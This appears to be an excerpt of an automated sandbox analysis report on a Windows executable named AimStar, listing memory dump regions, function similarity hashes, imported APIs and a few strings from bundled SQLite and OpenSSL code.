                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction ID: cb331a170d3f3e293194661f9bce03eb423522669a638f87ad7619fa3e66968b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D13872B0CE488DE710DF65D4412AC7B75FB457A8B848235DE5E97B89DE38E10AC390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D0EC
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D177
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction ID: 3eedf9bb8d26ca03f70764ed13259895d48c43eed860efe5441def85ab95e8fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0391C422E1DE5185F760BF6594422BDABB8AB40BA8F944135DE0E537C5CE38F58AC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2830847230-0
                                                                                                                                                                                                                                          • Opcode ID: 1e9c3b333e92f9398ad194f103d8dae7cf096b4ecbbfa6e7b689bece2e41bd3a
                                                                                                                                                                                                                                          • Instruction ID: 8d23ad7f6fd54b6290d39df25c2f24d95efe37a736cacea9149f1a900f750970
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9c3b333e92f9398ad194f103d8dae7cf096b4ecbbfa6e7b689bece2e41bd3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5891F232A4BB46AAEAA4DF2691402793F94FB05BE0F085235DE6D077C1EF3CE4108318
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction ID: 1df53c408ac87d21559ad5b7a398082c095e1d7d5acafaa765a838ba00b1073c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0351E672F0CA1296EB14EF24D9566BCB7A9AB44378F900135DE1E52BE4DB38B50EC710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction ID: fdb5de7aaca57e00742cf106519a0bc47bce86131521b43fea6d55521e0ca2ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39519F22E08A418AFB10EFB194663BDB3B9AB44B68F544435DE0997788DF3CE549C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2830847230-0
                                                                                                                                                                                                                                          • Opcode ID: 3c08a722618443dc9e64212b31889d72d03edf34bf81bea55b0cd35d2927df6b
                                                                                                                                                                                                                                          • Instruction ID: a3a64ce36fbeb0d4ea82506d1c7cfa2f6c8f54de9e94053aca11f503f88fe060
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c08a722618443dc9e64212b31889d72d03edf34bf81bea55b0cd35d2927df6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121DD62B0A75297E624AB16B9410BAA3A1FB45BC0F081131DBCE47F96CF3CF4508314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction ID: 8a570ae75a92e774982ca7b832906848268e8ccc999ea8b94485a5429671bc05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E411E935B0C94682F694AB6AE5466B99295EBC47A0FC44030DF4947B8ACD2DF5C9C220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                          • Instruction ID: 8b27eb47c21b3926b5342414c268c2936358d1536ddaf21cb1a28f24f52f6df5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71113022B19F419AEB00CFA0EC542B833B4FB59798F451E31DA6DC6BA4EF78D1948340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction ID: f0317e65e8596aa9e8f84eb3ef76c3de50361feac90b3b1882d1941425c9f424
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F112136B18F0589EB00DF60E8552B973A8F759768F440E31EA5D467A4DF7CE198C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction ID: d5cd84849bb901c0d4e45b71b98c1f89bc297d796673082668b894612a356720
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43117C32B16F019AEB00CF60E8442B933A4FB18798F441E31DA2D42BA4DF7CD558C394
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                          • API String ID: 2830847230-2410398255
                                                                                                                                                                                                                                          • Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                          • Instruction ID: 456c06edc3f6c684976644faf4f1ab80758be20d3a5db5832d855f24edfe721b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EC1D262F4A642A6FB25DA25C58027C6FE0EF11BC4F544436CB5E57795EF2CE8828338
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                          • API String ID: 3535234312-384499812
                                                                                                                                                                                                                                          • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                          • Instruction ID: f23b0a9202cc2991d8efdf23b5b0a81fdb77a112d341d2e78be9064c5bfad680
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAD13B22A0EBC6A6EB54DF29D4902B937A4FB44BC4F485035DE6C87799EF38E452C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: string or blob too big
                                                                                                                                                                                                                                          • API String ID: 2830847230-2803948771
                                                                                                                                                                                                                                          • Opcode ID: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
                                                                                                                                                                                                                                          • Instruction ID: ad4641f60641dc756fb694d45fdd62757d3b72974256fe9909efaf17ff9ce57a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33919C61E8E206AAFB68DB15949537927A0EF90BC4F084135CF4D073D2DF3DE84587A8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                          • API String ID: 2830847230-515162456
                                                                                                                                                                                                                                          • Opcode ID: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
                                                                                                                                                                                                                                          • Instruction ID: 50e4c3a139aa72d5c09e6820ece5cdc743e874b69d611d7e1619a74ad724bdfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f5227921f22cb0f72dae9ad137befb43498b0d25aef2762e31f82c80f9ea1e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8681AD73A8AA42E5EB90DB05D4446B97FA6FB54BC4F5A8036DA4C07285EF3CE541C328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
